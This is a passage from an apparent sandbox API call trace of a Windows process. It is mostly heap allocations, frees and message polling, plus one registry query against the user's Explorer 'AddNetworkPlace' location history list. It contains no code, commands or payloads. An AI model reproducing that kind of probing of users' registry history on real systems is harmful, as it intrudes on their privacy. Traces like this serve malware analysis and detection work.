lpMsg=0x61ebdc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebdc) returned 0 [0072.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6d0 [0072.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aec8 [0072.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690760 [0072.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aeb0 [0072.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af10 [0072.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0072.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0072.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af10 | out: hHeap=0x650000) returned 1 [0072.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0072.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x6b88e0 [0072.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690750 [0072.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690720 [0072.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d720 [0072.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af10 [0072.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0072.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690730 [0072.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0072.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af10 | out: hHeap=0x650000) returned 1 [0072.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d720 | out: hHeap=0x650000) returned 1 [0072.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690720 | out: hHeap=0x650000) returned 1 [0072.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af10 [0072.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0072.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b108 [0072.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690720 [0072.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b108 | out: hHeap=0x650000) returned 1 [0072.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690720 | out: hHeap=0x650000) returned 1 [0072.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0072.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690720 [0072.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0072.914] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690720 | out: hHeap=0x650000) returned 1 [0072.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b108 [0072.915] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac40 [0072.915] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac28 [0072.915] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690720 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac28 | out: hHeap=0x650000) returned 1 [0072.915] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d720 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0072.915] PeekMessageW (in: lpMsg=0x61ebdc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebdc) returned 0 [0072.915] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0072.915] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690730 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0072.915] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.915] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690730 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad48 | out: hHeap=0x650000) returned 1 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad00 | out: hHeap=0x650000) returned 1 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b6fb8 | out: hHeap=0x650000) returned 1 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.915] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690830 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d040 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d018 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0a8 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b480 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b078 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b060 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d658 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aca0 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0c0 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b120 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6907f0 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0072.916] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0072.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aeb0 | out: hHeap=0x650000) returned 1 [0072.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aec8 | out: hHeap=0x650000) returned 1 [0072.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690760 | out: hHeap=0x650000) returned 1 [0072.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6d0 | out: hHeap=0x650000) returned 1 [0072.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b258 | out: hHeap=0x650000) returned 1 [0072.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a700 | out: hHeap=0x650000) returned 1 [0072.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690890 | out: hHeap=0x650000) returned 1 [0072.917] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6d0 [0072.917] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a700 [0072.917] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690890 [0072.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a700 | out: hHeap=0x650000) returned 1 [0072.917] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692de8 [0072.917] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a700 [0072.917] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690760 [0072.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.917] PeekMessageW (in: lpMsg=0x61f10c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f10c) returned 0 [0072.917] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690730 [0072.917] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0072.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0072.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.917] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690730 [0072.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.917] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690730 [0072.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.917] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690730 [0072.917] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6c9398 [0072.918] PeekMessageW (in: lpMsg=0x61f10c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f10c) returned 0 [0072.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690730 [0072.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b258 [0072.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0072.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0072.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6907f0 [0072.918] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6907f0 | out: hHeap=0x650000) returned 1 [0072.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aec8 [0072.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6907f0 [0072.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764c48 [0072.918] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aec8 | out: hHeap=0x650000) returned 1 [0072.918] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0072.918] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0072.918] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.918] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b258 | out: hHeap=0x650000) returned 1 [0072.918] PeekMessageW (in: lpMsg=0x61f10c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f10c) returned 0 [0072.918] PeekMessageW (in: lpMsg=0x61f10c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f10c) returned 0 [0072.918] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6c9398 | out: hHeap=0x650000) returned 1 [0072.918] PeekMessageW (in: lpMsg=0x61f10c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f10c) returned 0 [0072.918] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b4f8 | out: hHeap=0x650000) returned 1 [0072.918] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b240 | out: hHeap=0x650000) returned 1 [0072.918] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d78 | out: hHeap=0x650000) returned 1 [0072.918] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690630 | out: hHeap=0x650000) returned 1 [0072.918] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cf28 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b228 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x770f98 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690690 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cfc8 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690590 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cfa0 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x764c48 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6907f0 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a640 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cf50 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6905d0 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cf78 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d40 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cf00 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af10 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d720 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690720 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac40 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b108 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690750 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b88e0 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690760 | out: hHeap=0x650000) returned 1 [0072.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a700 | out: hHeap=0x650000) returned 1 [0072.920] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692de8 | out: hHeap=0x650000) returned 1 [0072.920] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690890 | out: hHeap=0x650000) returned 1 [0072.920] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6d0 | out: hHeap=0x650000) returned 1 [0072.920] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6a0 | out: hHeap=0x650000) returned 1 [0072.920] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690890 [0072.920] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0072.920] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0072.920] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690890 | out: hHeap=0x650000) returned 1 [0072.920] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690640 | out: hHeap=0x650000) returned 1 [0072.920] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6c9398 [0072.920] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.920] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6c9398 | out: hHeap=0x650000) returned 1 [0072.920] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.920] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6d0 [0072.920] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6a0 [0072.920] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690640 [0072.920] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a700 [0072.920] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690890 [0072.920] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690890 | out: hHeap=0x650000) returned 1 [0072.920] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690890 [0072.920] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690890 | out: hHeap=0x650000) returned 1 [0072.920] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6c9398 [0072.920] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.920] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690890 [0072.920] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d720 [0072.920] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b108 [0072.921] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690760 [0072.921] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac40 [0072.921] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690760 | out: hHeap=0x650000) returned 1 [0072.921] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af10 [0072.921] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690760 [0072.921] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690760 | out: hHeap=0x650000) returned 1 [0072.921] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8002) returned 0x694cf8 [0072.921] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690760 [0072.921] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0072.921] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690750 [0072.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0072.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690720 [0072.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a640 [0072.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0072.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b228 [0072.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6905d0 [0072.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xf0) returned 0x6b6fb8 [0072.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6907f0 [0072.922] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a640 | out: hHeap=0x650000) returned 1 [0072.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xe0) returned 0x6b70b0 [0072.922] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b6fb8 | out: hHeap=0x650000) returned 1 [0072.922] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6907f0 | out: hHeap=0x650000) returned 1 [0072.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6907f0 [0072.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a640 [0072.922] CharUpperBuffW (in: lpsz="HKCU64", cchLength=0x6 | out: lpsz="HKCU64") returned 0x6 [0072.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b240 [0072.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690590 [0072.922] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b240 | out: hHeap=0x650000) returned 1 [0072.922] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690590 | out: hHeap=0x650000) returned 1 [0072.922] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a640 | out: hHeap=0x650000) returned 1 [0072.922] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6907f0 | out: hHeap=0x650000) returned 1 [0072.923] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\PublishingWizard\\AddNetworkPlace\\AddNetPlace\\LocationMRU", ulOptions=0x0, samDesired=0x20119, phkResult=0x61f164 | out: phkResult=0x61f164*=0x0) returned 0x2 [0072.923] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b70b0 | out: hHeap=0x650000) returned 1 [0072.923] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.923] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0072.923] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690720 | out: hHeap=0x650000) returned 1 [0072.923] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0072.923] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690750 | out: hHeap=0x650000) returned 1 [0072.923] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690760 | out: hHeap=0x650000) returned 1 [0072.923] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x694cf8 | out: hHeap=0x650000) returned 1 [0072.923] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac40 | out: hHeap=0x650000) returned 1 [0072.923] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b108 | out: hHeap=0x650000) returned 1 [0072.923] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af10 | out: hHeap=0x650000) returned 1 [0072.923] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d720 | out: hHeap=0x650000) returned 1 [0072.923] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690890 | out: hHeap=0x650000) returned 1 [0072.923] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d720 [0072.923] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af10 [0072.923] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690890 [0072.923] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b108 [0072.923] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac40 [0072.923] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0072.923] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, 